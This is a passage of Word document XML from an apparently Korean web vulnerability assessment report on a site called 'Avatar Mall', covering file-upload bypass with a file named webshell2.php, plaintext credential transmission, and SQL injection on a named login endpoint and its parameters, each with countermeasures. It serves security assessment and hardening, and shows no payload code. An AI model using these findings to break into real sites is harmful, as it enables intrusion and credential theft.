        <w:t>webshell2.php파일을 확장자 변조 등을 통해 업로드를 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00C5558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57B1025B" wp14:editId="3CB4346D">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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4" b="44438"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860225" cy="306035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587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="_Toc48909181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29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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>데이터 변조를 이용한 파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="000411AE" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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505" w:name="_Toc48909080"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w:rsidR="001E5591" w:rsidRDefault="00C55587" w:rsidP="001E5591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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E5591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 서버 루트 폴더 내의 파일 중 사용하지 않는 불필요한 파일 및 샘플 페이지 삭제</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5591" w:rsidRDefault="001E5591" w:rsidP="001E5591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>삭제해야 할 파일 확장자</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="850" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8166"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E5591" w:rsidTr="001E5591">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>*.bak</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.zip</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.new</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.bakup</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.log</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001E5591" w:rsidRPr="008C3F94" w:rsidRDefault="001E5591" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.org</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C3F94" w:rsidRPr="001E5591" w:rsidRDefault="008C3F94" w:rsidP="008C3F94">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:after="200"/>
            </w:pPr>
            <w:r w:rsidRPr="008C3F94">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>*.!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="008C3F94">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="008C3F94" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="506" w:name="_Toc48909081"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>데이터 평문 전송</w:t>
      </w:r>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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b"/>
        <w:numPr>
          <w:ilvl w:val="0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b"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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507" w:name="_Toc48909082"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w:rsidR="008C3F94" w:rsidRDefault="00C55587" w:rsidP="00C55587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="008C3F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 상의 데이터 통신은 대부분 텍스트 기반으로 이루어지기 때문에 서버와 클라이언트 간에 암호화 프로세스를 구현하지 않은 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidRDefault="008C3F94" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 간단한 도청(</w:t>
      </w:r>
      <w:r>
        <w:t>Sniffing)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 통해 정보를 탈취 및 도용 당할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587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508" w:name="_Toc48909083"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508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C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="008C3F94">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>서버 전체</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidTr="00C55587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C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C5558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C55587" w:rsidRPr="001532F8" w:rsidRDefault="00C55587" w:rsidP="00C55587">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001532F8">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="008C3F94">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>암호화 통신을 하고 있지 않아, 정보가 도청될 수 있음</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00C5558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8C3F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>데이터가 평문 전송하여 아이디,</w:t>
      </w:r>
      <w:r w:rsidR="008C3F94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C3F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>패스워드가 도청됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00C5558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684C0B7E" wp14:editId="4861CF11">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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8" t="16333" r="30168" b="31310"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860491" cy="306052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587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="_Toc48909182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30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8C3F94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>데이터 평문 전송</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="008C3F94" w:rsidP="00C55587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C55587" w:rsidRPr="00C97C1E" w:rsidRDefault="00C55587" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="510" w:name="_Toc48909084"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>업로드 되는 파일에 대한 확장자 검증 및 실행 권한 제거함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587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꼭 필요한 경우가 아니면 업로드 기능을 구현하지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRDefault="00C55587" w:rsidP="00C55587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화이트 리스트 방식으로 허용된 확장자만 업로드 허용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="0070637F" w:rsidRDefault="00C55587" w:rsidP="00C55587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업로드 되는 파일을 디렉터리에 저장할 때 파일명과 확장자를 외부 사용자가 추측할 수 없는 문자열로 변경하여 저장(파일 이름은 DB에 저장)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55587" w:rsidRPr="00C55587" w:rsidRDefault="00C55587" w:rsidP="00F0740E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00872DF7" w:rsidRPr="00C97C1E" w:rsidRDefault="00872DF7" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="_Toc48909085"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상세 진단 결과(아바타몰)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="512" w:name="_Toc48909086"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL 인젝션</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="_Toc48909087"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:t>- SQL 인젝션은 응용프로그램 보안 상의 허점을 의도적으로 이용해, 개발자가 생각지 못한 SQL문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작하는 공격 방법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="514" w:name="_Toc48909088"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514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A10BAC" w:rsidRPr="00A24C89" w:rsidTr="00FA3A45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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>취약한 매소드/경로</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>및 파라미터</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:t xml:space="preserve">* POST /jsp/login_proc.jsp </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00FA3A45" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  - userid, passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidTr="00FA3A45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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC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A24C89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A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00FA3A45">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>- S</w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:t xml:space="preserve">QL </w:t>
            </w:r>
            <w:r w:rsidRPr="00A24C89">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>인젝션 공격에 취약한 파라미터가 존재하며, 이 취약점을 통해 중요한 정보를 공격자가 탈취 가능함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA3A45" w:rsidRDefault="00FA3A45" w:rsidP="00A10BAC"/>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00FA3A45" w:rsidP="00A10BAC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BA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A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL 인젝션 공격이 가능한지 시도함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BA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0983DE0C" wp14:editId="22EA2A7C">
            <wp:extent cx="4859539" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="2667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" t="8832" r="48995" b="41396"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860116" cy="306036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BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="515" w:name="_Toc48909183"/>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[그림</w:t>
      </w:r>
      <w:r w:rsidR="0060126B">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ [그림_3- \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000411AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>SQL 인젝션 공격 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="515"/>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BA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2]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 xml:space="preserve">SQL 인젝션 공격의 에러 메시지 반환으로 </w:t>
      </w:r>
      <w:r w:rsidR="00FA3A45">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MS </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>사용을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10BAC" w:rsidRPr="00C97C1E" w:rsidRDefault="00A10BAC" w:rsidP="00A10BA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0C6C97E7" wp14:editId="3D0C2144">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2667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9" b="50023"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860234" cy="306036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BAC" w:rsidRPr="00A24C89" w:rsidRDefault="00A10BAC" w:rsidP="00A10BAC">
      <w:pPr>
